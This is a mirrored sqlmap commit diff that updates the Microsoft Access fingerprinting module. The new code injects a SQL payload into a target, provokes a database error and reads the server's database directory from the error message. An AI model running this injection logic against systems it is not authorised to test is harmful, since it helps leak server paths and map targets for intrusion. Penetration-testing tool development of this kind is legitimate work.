mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-26 03:23:48 +03:00
one more ms access update
This commit is contained in:
parent
c98d8fed83
commit
6ad8bbfc8e
|
@ -14,6 +14,8 @@ from lib.core.common import formatDBMSfp
|
||||||
from lib.core.common import formatFingerprint
|
from lib.core.common import formatFingerprint
|
||||||
from lib.core.common import getHtmlErrorFp
|
from lib.core.common import getHtmlErrorFp
|
||||||
from lib.core.common import randomInt
|
from lib.core.common import randomInt
|
||||||
|
from lib.core.common import randomStr
|
||||||
|
from lib.core.common import wasLastRequestError
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
@ -42,13 +44,13 @@ class Fingerprint(GenericFingerprint):
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
retVal = "not sandboxed" if result else "sandboxed"
|
retVal = "not sandboxed" if result else "sandboxed"
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def __sysTablesCheck(self):
|
def __sysTablesCheck(self):
|
||||||
infoMsg = "executing system table(s) existance fingerprint"
|
infoMsg = "executing system table(s) existance fingerprint"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
# Microsoft Access table reference updated on 01/2010
|
# Microsoft Access table reference updated on 01/2010
|
||||||
sysTables = {
|
sysTables = {
|
||||||
"97": ("MSysModules2", "MSysAccessObjects"),
|
"97": ("MSysModules2", "MSysAccessObjects"),
|
||||||
|
@ -83,6 +85,30 @@ class Fingerprint(GenericFingerprint):
|
||||||
|
|
||||||
return None
|
return None
|
||||||
|
|
||||||
|
def __getDatabaseDir(self):
|
||||||
|
retVal = None
|
||||||
|
|
||||||
|
infoMsg = "searching for database directory"
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
randInt = randomInt()
|
||||||
|
randStr = randomStr()
|
||||||
|
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
|
||||||
|
query = agent.postfixQuery(query)
|
||||||
|
payload = agent.payload(newValue=query)
|
||||||
|
page = Request.queryPage(payload, content=True)
|
||||||
|
|
||||||
|
if wasLastRequestError():
|
||||||
|
match = re.search("Could not find file\s+'([^']+?)'", page[0])
|
||||||
|
|
||||||
|
if match:
|
||||||
|
retVal = match.group(1).rstrip("%s.mdb" % randStr)
|
||||||
|
|
||||||
|
if retVal.endswith('\\'):
|
||||||
|
retVal = retVal[:-1]
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
def getFingerprint(self):
|
def getFingerprint(self):
|
||||||
value = ""
|
value = ""
|
||||||
wsOsFp = formatFingerprint("web server", kb.headersFp)
|
wsOsFp = formatFingerprint("web server", kb.headersFp)
|
||||||
|
@ -120,6 +146,8 @@ class Fingerprint(GenericFingerprint):
|
||||||
if htmlErrorFp:
|
if htmlErrorFp:
|
||||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||||
|
|
||||||
|
value += "\ndatabase directory: '%s'" % self.__getDatabaseDir()
|
||||||
|
|
||||||
return value
|
return value
|
||||||
|
|
||||||
def checkDbms(self):
|
def checkDbms(self):
|
||||||
|
|
Loading…
Reference in New Issue
Block a user